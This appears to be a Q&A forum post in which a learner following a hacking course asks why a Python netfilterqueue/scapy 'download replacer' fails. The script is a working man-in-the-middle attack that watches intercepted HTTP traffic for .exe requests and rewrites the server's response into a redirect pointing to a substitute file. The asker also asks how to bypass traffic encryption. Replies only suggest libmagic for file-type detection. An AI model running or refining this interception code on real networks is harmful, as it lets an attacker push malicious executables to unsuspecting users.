# How do i make my download replacer detect .exe files

Tags: python, linux, networking, scapy, netfilter

I am taking Zaid's course and I can t seem to get the same load he gets in the raw layer of the packet thus the code doesn't work.

This is the code:

```
import netfilterqueue
import scapy.layers.inet6 as scapy
import scapy.layers.http as scap

ack_list = []

def set_load(packet, load):
    packet[scap.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scap.TCP].chksum
    return packet

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy.Raw in scapy_packet and scapy.TCP in scapy_packet:
        if scapy_packet[scap.TCP].dport == 80:
            if ".exe".encode() in scapy_packet[scap.Raw].load:
                print("[+] Exe Request")
                ack_list.append(scapy_packet[scap.TCP].ack)
        elif scapy_packet[scap.TCP].sport == 80:
            if scapy_packet[scap.TCP].seq in ack_list:
                ack_list.remove(scapy_packet[scap.TCP].seq)
                print("[+] Replacing file")
                modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved     Permanently\nLocation: https://www.example.org/index.asp\n\n")
                packet.set_payload(bytes(modified_packet))
    packet.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run() `
```

Instead it gives me this gibberish. Does anyone know how to make my code so that it knows which packet is part of an `.exe` file?

```
load      = '\\xac\\xfdl\\x9c\\xc8\x11\x0e\\xafu\\x80xb\x16\\xe5\x02\\xbcW\\x85>\\xa2Ț\\xfd\\xc6TF\\x8dK\\xf8\ cd\\xe9;Z25\x1a\\xaa\\xe3;/\\xdcG!o\\xf8\\xc8|\\x93\x19p\\xe5o\\xdb6\\xb4\\xf0\x0b\\xbf\\x86F9ˆ\\xef\x04\\xb6\\xea>O(\\xca\\xc4\\xe3z\x11\\xf7r\x18^Z\\x98\\xa8\\x8e\x1ep=r{n\\xca\\xc4j\\xfai\\xaf+\\xff\\xddC\x02)\x10\\xf4;\x05"\\xba\\xfb\x07\\xb6%5*0\\xef\\x87T8\\x9b\\x98\\xb1o\x13\x17\t\\x86j\\xf3]#\\xa0xu\\xc0\\xae\\xdd\x08\\xd1*\\xfc\\x9e*\\xe7\\\\xaeJ\\x98\x7f\\x8e\\x9cLb\\x94|\\xf7/"\\xd1\\xfd\\x87V\\xa0A\\xc6\x06+\\xbd(e\\xa3\x0b\\x86\\xb7?Uɰ\\xda\x1dO\\xb8\\xd8\\xe7\\xb9\\xe1P\\xc8X\\xc2\r\\xe0y\x03\\x88\\xb0s\\x8e\\xe5\\xd2\r\\xdc\x14\\xadd\x0c\\xcaO\\xc4M\\x96O\\x83nEJ\\xf5\\xba\\xd4\\xf1\\xe9e\x1d\\x88\\xa5~\\xc3/>\\x80\x05(\\xda"\x0f\x0b[!\t\x01,U\x02\\xd7?\n\\xde\x17\\x82됌c\\x9a\\xc7?\\xdcƗ\\x8ex\x06\\xdcc\\xcaqf\x06\\xec\\xb4\\xfe\x01\\xefӫ\x1b]\x00hc\\x95\\xcax:dBE\x1bŏ\\xc1\\xff\\x94\\xf4\x14\\xee\\xe5\\x99\\xe7\\xc1\x0fq(\\xcd%\x02\\xbd\\xf4~\\xadr\x11\x07\\xac\'\\xca\\xe5\\xa7|\x13\\xe4\\xa8a\\x80\x052\\x80\\xa8\\x85\x17Hǳs_c9\\xe3^\x1cј\\xa8X\\xd3\\xeegq* ,=$\\xa3\\x96\\x91\\xde\x18\\xbdyF\\xbeR\x0btv\\xc2\x7f\\xfe\x15\\xef\\xde\x0c1\\xb9\\xfbx\\x951\\xcc5\\x80\\xadm\x17G\\xd67\x01\\xbd\x02\r\\xd6\\xe0]\\xe4\\xe2\\x88ߟN\\xe6\\xcc\'DR\x1f-F/~\x0f\\x9e\x0b\\xcbF\\xd3g\\xaa\\xbfi\\xd3^\\x98\\xd2\\xee\\xff\\xbb\\xd8i\\xdc(\\x8fZ\\xecؗ\\xa0\x1a\\xf0\'նm\\xd1:\x1cXw\x02\x1fT\\xc7쇶Q|ϰS\\xf2\\xb4\\xe4\\xe5\\xa19\\x97\\xb7}\\xd1}\\xcb\x01\x15\\xe9\x0e\\xce\\xf3c\\xe4\\x97c\\xac\\xe8R\\\\xbb\\xe6+\\xb7O\\x9b\x0b\\x85\\xfb\\xb6\\xe6\\xdf\x08\\xff\\xa6\\xdf\x7f\u038dP\\x97\\xf1E\x15\x19\\xb0BO\\xd6;tFD\\xfcV)\\x9c\\xfa\\xf8\\xd2\\xd7~\\xd9 \\xff9:\\x90\x18\x1d\\xfb\\xfdD\\xb0\\xcav4\\x81]#`Zx4\\xae#T\\xe6`\\xb7tt>O\x0c\\xf3\x0ca~\x13\\xa7y7\\xac\\xe9c!\x0f\\xd0ճ\\xe5lۦ\\xe7\tr\\x97؏\x15\\xfd\\x82\x1a\x18X\\xe2\\xd6"Z\x1f\\xf1U\\xa3A\\xfaʁ\\x93\x1e\\xa1Q\x7fK\\xd1:\\xa6~3\\x97\\x9fL\\x9e\\x93\x11\\xa1\\xd6^\\xdck\\xd8s\\xfc\\xf5\\xc 7\\xf3\\xd24\\xb4z\\xa1\x13V\\x82\\x98\\xdfzy\\xcb\\xcc\\xf48\x1cG\\xcbI\\x9f\\xad\\xe1&/m\x05\\xc6\\xc5\\xfb\\xb0ߑ~\\xc8~\x06\\x950\\x88Z\x14\\x88\\xe3Na\\xd9]Ue\\xee\\xd3V\\x8d\\xe8\\xc6\x00\\x96T7D\\xd7\\xddm\\x86\\xb7\t\\xbe\\x8cM#\\xedz\\x87Ȫww\\xe2\\xb40\\xe8\\x8bi\\xfd\\xd4\x0cF\\x957\\xe3\x04\\x85\\xff\\xd37\'\\xee[\x1cᄆ)\\xe4\\x93\x18\\xd9r)\x115\\xd1i-{\\xe27\\xc1\\xb5\\x8a\x02\\xc4\\xfb\x0b0ݞdr\\x88}F\\xa5\\xf5\t\x15\\xd9Y\\xe4i\x0b\\xabA\\xdbCO\x1b\\xa1\\xa7Q\\x9b0\\xc7j\\xc9|\x01\\xee\x05\x19Q6X\\xad\\x8f\\xa7T.u\\xa3\\xfd\\xcb<\\xeeQ\\x98(\x11\\xfd\\xf7H\\xfe>\\xbf\x03\\xe6\\xc6+\x0f\\xa6M\\xd2\\xc8\x0f:\\xbb\\xd1"\\xec\\xf4C\\xa6\x06\\xef\\xf7\\xf7к\\xe6X\x0f>\\xc5\t\\x8f\\xb7\\xae*\x0e\\xa8\x06\\\\x90KH\\x93\\xb5\\x94ܕ6vf\\x8c\x0f)Z\\xf3\\x92>\\xffV`Ye"\\xfa\n\\xbd\\x80\x7f\\xe9\x11\\x97^q\\xaf\\xc6\\xce\\xc3\\xe4\\xfc\\xcb`]#Q\\x8b\\xab\\xf5>Pܑ\x13\\xe0\x13rn\x13\x03\x1f\\xf5\\x9bO\\xfb\\xcf\\xc0\\xdf\\xe6\\xbdO\\xaa\\xd3\\xfb\\xc9_\\xf8r u\\xf3\\xb9\\xe2\\xf6\r\x0bGe\\xfbK\\x82_\\x87\\\\xa5mH\\xad\\xf4\\xb2\\xe4\\xfc\\xaax\\xf7op\\xaet\x16e8\\x8e\\xa9}g\\xdf\\xf4MK\\x85\x11\x03?\\xe5\\xef\\x80\x0c\x0c\\xa2ŀq\\xbfМ\\xe5\\xaf\\xfd\\xa6\\xeb_p\\xa8\x02\\xa7j\\x81Ki\x00_\\x8f\\xf1\\xdc37\x14+E\x1f\\xe89\\xfb\x04xT\\xea\\xb0eS\\xf7\x1b?\\xecs\x12\\x93G\\xc6\\xd5b]\'\\x9e\\xf0\\xe7̓\\x8b\\xcb\\xd6a\x0b\x00&\\x84\x16\\xce\\xd6E\\xb3\\x82\x10\x1d\\xfd\\x80+;]\x1f,GN\\x9e\\xb5D\\x84\\xdbW\\xa0\\x93\\xf1\\xc9\\xc5h\\x9f\\xc7\\xf2\\x97\x0e\\xe2Y8\\xee$\\xf79\\xad\\x96\x05G\\xd9)$0\\x84m\\xa8EW\\xf13\tZ\x17\\x9a\x0f\x1dZ\\xb3\\x82\u070e\\xef\x17c#5\\x88\n\r\\xd3N\\xdfq\x05\x04\\xa5\x00\x04\x0e%\\xfb\\xbbH\\xe2\\xc8}\x7fd\\xe5t\x02\\xfd䵉i\x1e%O\\xc7\x05ȿ\\xb5\\xfaO#\x1b\\xb0\\xbb\\xb1&!\\xaf\\xf84\\xbb\\x95\\xa4\\xd4\x03\\x98x$ވ\\xa4c\\xd4Q7Q|\x19\\x89u\\xcf\\xc5]q\x14(\\x9a\\xe0\\xc9\\xda\\xeae\\xb7\\xbbl\\xa0h\\x9e.\x1c\x10<\\xf1\x1b\\x8a\\xd1\x8a\\x99\\xd9B\\xe9\\xe0-\\xf0K7\'\\x87\x1buM\\xa7R\\xba\\x97\\xee\\xf8k\\xa1\\x81#\\xb5\\x94E\x0f\\xec\\x88ٸPu\x07\\x97\x101\\xb2\x9c|./\x11;l\\xaa\\xc7\\xc9?\x0fB:|p\x14\x0b\\xdcl\\xbc\\xf6\\xdf[G\x08WH8\\xd4WY=^{\\xb8\\xb5D\\xc9xT\x1b`\x18\\xe0Fu\\x836\\xd0tx\\x90d\\xbe'
```

The code should have found the .exe files and replaced them with the file I gave it, but in the tutorial the load had the literal `.exe` string, but that doesn't seem to be the case for me. I tried looking for something that all `.exe` packets had in common but I was unsuccesful. I also don't know if the packets might be encrypted. If so, what am I supposed to do to bypass that encryption?

Comment: The code simply seems to look for `.exe` _request_ i.e. something which contains the literal string `.exe`. Perhaps you can [edit] to clarify what you thought the code should do and how you are testing it.

Comment: thank u for ur advice, i tried making the question more clear

Comment: The `.exe` format has a simple header at the beginning, but any subsequent packet after that could contain pretty much anything. Are you looking for the session start or just any packet anywhere in the stream (which really is not a problem you can solve without much more effort)?

Comment: Yes i m trying to find the session start, but the load doesn t contain a header in my case and i don t know why.

Answer (score 0):

You are probably looking for a way to determine the file type out of its contents. The standard way to do this in unix-like systems is [libmagic](https://man7.org/linux/man-pages/man3/libmagic.3.html). There exists a [python binding](https://pypi.org/project/python-libmagic/) for it.